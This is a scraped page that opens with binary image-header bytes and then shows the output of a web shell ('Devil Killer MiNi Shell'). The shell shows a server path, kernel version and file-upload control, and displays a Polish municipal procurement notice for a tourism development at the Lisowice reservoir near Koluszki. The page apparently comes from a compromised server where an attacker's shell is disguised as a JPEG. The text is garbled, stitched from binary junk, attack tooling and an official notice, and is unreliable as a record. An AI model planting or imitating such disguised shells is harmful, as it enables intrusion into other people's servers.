JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/16799_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>16799</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Urząd Miejski w Koluszkach</nazwa><ulica>ul. 11-go Listopada</ulica><nr_domu>65</nr_domu><nr_miesz></nr_miesz><miejscowosc>Koluszki</miejscowosc><kod_poczt>95040 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>łódzkie</wojewodztwo><tel>447 256 700</tel><fax>447 145 840</fax><email>um@koluszki.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url>www.koluszki.samorzady.pl</adres_strony_url><podmiot2c></podmiot2c><regon>59064836200000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu>Zadanie  dofinansowane zostanie ze środków w ramach Regionalnego Programu Operacyjnego  Województwa  Łódzkiego na  lata  2014 – 2020. Oś Priorytetowa VI  Rewitalizacja  i  potencjał  endogeniczny regionu. Działanie VI. 2   Rozwój  gospodarki  turystycznej. Poddziałanie VI.2.1.  Rozwój gospodarki turystycznej.</nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>administracja samorządowa</rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia /><dostep_dokumentow_zamowienia></dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>www.koluszki.samorzady.pl</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>Ofertę w wersji papierowej naleźy dostarczyć do kancelarii Urzędu Miejskiego w Koluszkach</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>N</czy_podzielone_na_czesci><oferty_lub_wnioski /><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>95-040 Koluszki ul. 11 Listopada 65</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Rozwój  gospodarki  turystycznej w miejscowości Lisowice, 
gmina  Koluszki. Zadanie realizowane w formule projektuj i buduj.
</nazwa_zamowienia><numer_referencyjny>GIZ 271.4. (4). 2017</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>B</rodz_zam><przedmiot_zam>1. Przedmiotem  zamówienia  jest  zagospodarowanie terenów wokół  zbiornika  Lisowice dz. nr  25, 29, 31, 187, 188, 24/3, 24/4, 164, 186 oraz ewentualne inne działki niezbędne do realizacji ( obręb ewidencyjny nr 13 – Lisowice, gm. Koluszki), zgodnie z opracowanym  programem funkcjonalno – użytkowym. Celem realizacji  tego zadania jest stworzenie miejsc dla wypoczynku turystów poprzez: organizację plaży, kąpieliska, placów zabaw, boiska, dróg dojazdowych, ciągów pieszo - rowerowych oraz parkingów. W zakres projektu wchodzi również wyposażenie terenu w małą architekturę oraz urządzenia do uprawiania sportu i rekreacji. 

2. Zakres  przedmiotu zamówienia podzielony jest na dwa  następujące etapy: 
Etap I :  Faza  przygotowawcza i projektowa obejmuje: 
1) Wykonanie mapy do celów projektowych w wersji papierowej i cyfrowej wraz 
z aktualizacją  danych  w bazie danych Ewidencji Gruntów i Budynków, 
2) Ustalenie przebiegu granic działek objętych  opracowaniem, 
3) Wydzielenie działki pod wodami płynącymi i stojącymi wraz z ustaleniem linii brzegowych,
4) Wykonanie projektów budowlanych  wykonawczych  we wszystkich branżach wraz z opisami i  rysunkami  niezbędnymi do realizacji robót, a w razie potrzeby uzupełnionymi szczegółowymi projektami umożliwiającymi  wykonanie robót bez konieczności dodatkowych opracowań – w ilości 6 egzemplarzy 
5) Sporządzenie Specyfikacji Technicznej  Wykonania i Odbioru Robót Budowlanych  na  każdą z branż, przez którą należy rozumieć opracowanie zawierające zbiory wymagań  w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania  właściwości materiałów, wymagania  dotyczące sposobu wykonania i  oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac, 
6) Wykonanie kosztorysów inwestorskich  i  przedmiarów robót z  podziałem na każdą z  branż. 
7) Uzyskanie  w  imieniu  Zamawiającego wszelkich wymaganych przepisami prawa:  uzgodnień, decyzji, warunków  technicznych i opinii niezbędnych do opracowania dokumentacji projektowej, uzyskania wszystkich pozwoleń na realizację tej inwestycji. 
8) Niniejsze przedsięwzięcie jest inwestycją mogącą potencjalnie znacząco oddziaływać na środowisko. 
W związku z powyższym wykonawca powinien wykonać kartę informacyjną przedsięwzięcia i wystąpić o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia. W  przypadku wydania decyzji o konieczności przeprowadzenia oceny oddziaływania na środowisko  Wykonawca jest zobowiązany do wykonania przez osobę uprawnioną raportu o oddziaływaniu przedsięwzięcia  na środowisko. 
9) Opracowanie dokumentacji niezbędnej do wyłączenia działek z produkcji leśnej oraz rolnej, 
10) Uzyskanie na realizowana inwestycję pozwolenia wodnoprawnego w niezbędnym zakresie,
11) Wykonanie badania wody dla potrzeb  kąpieliska, 
12) Wystąpienie i  uzyskanie  pozwolenia na usunięcie  ( w niezbędnym zakresie )  kolidujących  drzew i zakrzaczeń na terenie realizowanej inwestycji w uzgodnieniu 
z konserwatorem przyrody - Regionalną Dyrekcją Ochrony Środowiska, 
13) Uzgodnienie rozwiązań projektowych z Regionalnym  Zarządem  Gospodarki  Wodnej  i  PODGiK, 
14) Uzyskanie decyzji  o pozwoleniu na budowę lub zgłoszenia zamiaru wykonania  robót budowlanych,
15) Wykonanie instrukcji bezpieczeństwa pożarowego wraz ze scenariuszem pożarowym.
16) Wykonanie instrukcji  bezpieczeństwa p.poż. 
17) Wykonanie instrukcji/ regulaminu korzystania z obiektów powstających w ramach inwestycji  wymagających przedmiotowego opracowania.  
18) Wykonanie i uzgodnienie  projektów organizacji ruchu drogowego 
19) Wszystkie dokumenty powinny być wykonane i przekazane Zamawiającemu  w wersji papierowej oraz w  wersji elektronicznej nagrane na płytę CD w formacie  pdf.  –1 egz.

Etap II:  Faza  wykonawcza  obejmuje:
1) Zakup i dowiezienie piasku na grubości warstwy minimum 1 m oraz aranżację plaży o powierzchni około: 7.000 m 2  
2) Montaż zjeżdżalni wodnej zakończonej niecką basenową, 
3) Przebudowa istniejącej kładki dla pieszych przez rzekę Mrogę.
4) Budowa pomostu drewnianego o długości około 280 m wzdłuż brzegu zalewu.
5) Budowa pomostu drewnianego pływającego przy przystani, 
6) Budowa obiektu gastronomicznego o średnicy 12 m o konstrukcji drewnianej z pełnym węzłem  sanitarnym.
7)  Dostawa i montaż wolnostojących  toalet damsko – męskich.
8)  Dostawa i montaż drewnianej, dwustanowiskowej przebieralni zewnętrznej.
9)  Dostawa i montaż dwóch rurowych pryszniców zewnętrznych,
10) Budowa parku linowego dużego minimum 40 atrakcji,
11) Budowa bezasekuracyjnego  parku linowego, 
12) Przygotowanie i  zabezpieczenie miejsca  na ognisko,
13) Budowa  drewnianych  wiat  z kompletem  ław  i  stołów biwakowych,
14) Przebudowa dróg dojazdowych o nawierzchni bitumicznej  zgodnie z Miejscowym Planem Zagospodarowania Przestrzennego,
15) Budowa ciągów pieszo- rowerowych o nawierzchni bitumicznej żywicznej lub kolorowego bitumu,
16) Utwardzenie  istniejących duktów leśnych kostką  brukową i dostosowanie ich  na potrzeby szlaków pieszo - rowerowych.
17) Budowa 4 parkingów dla samochodów osobowych,
18) Budowa i rozprowadzenie systemu  monitoringu  z kamerami,
19) Wykonanie  publicznej drogi dojazdowej wraz z chodnikiem, 
20) Budowa toru wakeboardowego wraz z zapleczem,
21) Oświetlenia terenu wokół zbiornika Lisowice,
22) Budowa  drewnianej platformy widokowej ( tarasu).
23) Wykonanie budynku zaplecza przystani o konstrukcji szkieletowej  drewnianej, 
24) Dostawa i montaż stojaków na rowery,
25) Budowa placu  zabaw dla dzieci,
26) Budowa siłowni zewnętrznej,  
27) Wykonanie dwóch boisk do plażowej piłki siatkowej wraz z wyposażeniem.

4.  Szczegółowy zakres prac do wykonania ujęty jest w Programie Funkcjonalno - Użytkowym sporządzonym przez Firmę BP MEDIATECH  CONSTRUCTION  Sp z o.o. Sp.K  z siedzibą w Radomsku przy ul. Kościuszki 6/3 stanowiący załącznik 9 do Specyfikacji  Istotnych Warunków Zamówienia.
Ponadto  przedmiot zamówienia został opisany w Opracowaniu uszczegóławiającym przedmiot  zamówienia, które jest uzupełnieniem informacji zawartych w Programie  Funkcjonalno – Użytkowym  i  stanowi załącznik nr 10 do  S. I. W. Z.
</przedmiot_zam><cpv1c>45200000-9</cpv1c><cpv2c>45100000-8</cpv2c><okres2c>31/05/2018</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>T</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst>Zamawiający  przewiduje udzielanie zamówień  uzupełniających, o  których mowa w art. 67 ust.1 pkt. 6 i 7  Ustawy  Prawo Zamówień  Publicznych. 
Zamówienia uzupełniające stanowiące nie więcej niż 50 % zamówienia podstawowego  będzie udzielone tylko w przypadku, gdy zajdzie taka konieczność i spełnione zostaną  przesłanki art.67 ust.1 pkt. 6 i 7 Ustawy Prawo Zamówień Publicznych</czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow>1)Zamawiający wskazuje, że Wykonawca nie musi przedkładać umów 
o podwykonawstwo na dostawę materiałów potrzebnych do realizacji zadania, oraz na  wykonanie usług, których  wartość nie przekracza kwoty brutto w wysokości:  50.000,00 zł  słownie:  pięćdziesiąt  tysięcy złotych.
2) Zamawiający wymaga, aby osoby wykonujące czynności związane z realizacją umowy i bezpośrednio skierowane przez Wykonawcę do realizacji zamówienia publicznego zatrudnione były na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz.U. z 2014 r., poz.1502 z późniejszymi zmianami). 
3) Zamawiający nie wprowadza zastrzeżenia, o którym mowa w art. 22 ust. 2 Ustawy Prawo Zamówień Publicznych, że o udzielenie zamówienia mogą ubiegać się wyłącznie zakłady pracy chronionej oraz inni wykonawcy, których działalność, lub działalność ich wyodrębnionych  organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych.
4) Zgodnie z art. 10 c pkt. 3 Ustawy  Prawo Zamówień Publicznych, Gmina  Koluszki odstępuje od wymogu komunikacji elektronicznej przy składaniu ofert i składanie oferty odbywa się za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca
</informacje_na_temat_katalogow><okreslenie_warunkow>Zamawiający nie określa minimalnego poziomu zdolności w tym zakresie. Wykonawca potwierdza  spełnienie warunku poprzez złożenie oświadczenia składanego na podstawie 
art. 25a ust. 1 Ustawy  dotyczącego spełniania warunków udziału w postępowaniu</okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>Zamawiający nie określa minimalnego poziomu zdolności w tym zakresie. Wykonawca potwierdza  spełnienie warunku poprzez złożenie oświadczenia składanego na podstawie 
art. 25a ust. 1 Ustawy  dotyczącego spełniania warunków udziału w postępowaniu - 
</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia składanego na podstawie art. 25a ust. 1 Ustawy dotyczącego spełniania warunków udziału w postępowaniu oraz poprzez wykazanie minimalnego poziomu zdolności wykazanego przez Wykonawcę,  że:
1) nie wcześniej niż w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał  minimum  dwie realizacje polegające na: zagospodarowaniu terenów na cele turystyczne lub rekreacyjne wraz z infrastrukturą towarzyszącą o wartości robót brutto nie mniejszej niż:  3.000.000,00 zł   słownie: trzy miliony złotych ( każda realizacja).  
Należy podać ich rodzaj, wartość oraz daty i miejsca wykonania robót i podmioty na rzecz których roboty te zostały wykonane, wraz z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. 
2) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał  minimum  dwie  realizacje polegające na wykonaniu  dokumentacji  projektowych  na zagospodarowanie terenów  na cele turystyczne  lub rekreacyjne wraz z infrastrukturą  towarzyszącą  wraz z uzyskaniem decyzji zezwalającej  na realizację inwestycji  o wartości prac projektowych  brutto nie mniejszej niż  80.000,00 zł  słownie: osiemdziesiąt  tysięcy złotych ( każda realizacja).  
Należy  podać przedmiot wykonywanych prac, wartość oraz daty wykonywania  i podmioty na rzecz których usługi zostały wykonane, wraz z załączeniem  dowodów  potwierdzających, czy prace zostały wykonane lub są wykonywane  należycie.
Uwagi:
a) Jeżeli zakres wykonanych  dokumentacji projektowych  lub robót  budowlanych  przedstawionych w dokumencie złożonym na potwierdzenie, że roboty  zostały wykonane  należycie  jest szerszy od powyżej  określonego przez  Zamawiającego  należy w  wykazie  robót wyodrębnić zakres odpowiadający wymaganemu  w Rozdziale XIII pkt. 3.1 SIWZ i podać wartość odpowiadającą temu zakresowi. 
b) W przypadku jeżeli wykonawca jest w trakcie wykonywania robót budowlanych wartość podana w warunku  powinna  dotyczyć  części  już wykonanej  i odebranej.
c)  Równowartość  w złotych zadań rozliczanych w walutach obcych  zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym zamieszczono ogłoszenie o niniejszym postępowaniu w Biuletynie  Zamówień  Publicznych.
3) dysponuje po minimum  jednej osobie na każde poniższe stanowisko i osoby te zostaną skierowane  do realizacji zamówienia publicznego: 
a) Kierownik budowy: posiadający uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami w specjalności konstrukcyjno - budowlanej bez ograniczeń, 
b) Kierownik robót w specjalności hydrotechnicznej: posiadający  uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami w specjalności konstrukcyjno - budowlanej w zakresie budowli hydrotechnicznych bez ograniczeń, 
c) Kierownik robót w specjalności drogowej - posiadający uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami w specjalności drogowej bez ograniczeń, 
d) Kierownik  robót w specjalności elektrycznej - posiadający uprawnienia do pełnienia samodzielnych funkcji  technicznych w  budownictwie  tj. do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń elektrycznych i  elektroenergetycznych  bez ograniczeń, 
e) Kierownik robót w specjalności sanitarnej - posiadający uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami w  specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, wodociągowych i  kanalizacyjnych bez ograniczeń, 
f) Projektant w specjalności drogowej: - posiadający uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do projektowania w specjalności drogowej bez ograniczeń,
g) Projektant  w specjalności  konstrukcyjno -  budowlanej posiadający uprawnienia do pełnienia samodzielnych funkcji  technicznych w budownictwie tj. do projektowania w specjalności konstrukcyjno- budowlanej bez ograniczeń 
h) Projektant w specjalności elektrycznej posiadający uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, 
i) Projektant w specjalności sanitarnej posiadający uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie  tj. do projektowania w specjalności instalacyjnej zakresie sieci, instalacji i urządzeń wentylacyjnych, 
Zamawiający dopuszcza łączenie ww. stanowisk. Uwaga  dotycząca  wszystkich  stanowisk wskazanych powyżej:  Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane  ( Dz. U. z 2016 r. poz. 290 z późniejszymi zmianami) osoby, które przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych 
w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z ich treścią decyzji o ich nadaniu w oparciu o przepisy będące podstawą ich nadania. 
Ponadto, zgodnie z art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z 2016 r. poz. 290 z późniejszymi zmianami)  samodzielne funkcje techniczne w budownictwie, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.  
Wszystkie osoby przewidziane do realizacji zamówienia muszą biegle posługiwać się językiem  polskim. W  przeciwnym wypadku  Wykonawca udostępni tłumacza  ze znajomością  języka  technicznego w zakresie terminologii budowlanej, we wszystkich specjalnościach występujących przy realizacji zamówienia. 
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie  SPEŁNIA /  NIE  SPEŁNIA.

Poleganie na zasobach innych podmiotów - zgodnie z art. 22 a Ustawy: 
1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, 
w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
2.  Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
3. Zamawiający ocenia, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe, pozwalają na wykazanie przez  wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 13–22 i ust. 5 pkt. 1-2 i 4-8 Ustawy.
4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.
5. Jeżeli zdolności techniczne lub zawodowe podmiotu, o którym mowa w ust. 1, nie potwierdzają spełnienia przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego:
1) zastąpił ten podmiot innym  podmiotem lub podmiotami lub
2) zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności  techniczne lub zawodowe, o których mowa w ust. 1.
</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>T</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2>T</art_24_ust_5_pkt_2><art_24_ust_5_pkt_3 /><art_24_ust_5_pkt_4>T</art_24_ust_5_pkt_4><art_24_ust_5_pkt_5>T</art_24_ust_5_pkt_5><art_24_ust_5_pkt_6>T</art_24_ust_5_pkt_6><art_24_ust_5_pkt_7>T</art_24_ust_5_pkt_7><art_24_ust_5_pkt_8>T</art_24_ust_5_pkt_8><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>1)  odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku  podstaw wykluczenia  na podstawie art. 24 ust. 5 pkt 1 Ustawy;  Odpis  składany przez Wykonawcę  do złożonej oferty.
2)  oświadczenia  składanego na podstawie art. 25a ust. 1  Ustawy dotyczącego przesłanek wykluczenia z postępowania – wzór oświadczenia stanowi załącznik nr 3 do SIWZ.  Oświadczenie  składane przez Wykonawcę  do złożonej oferty.
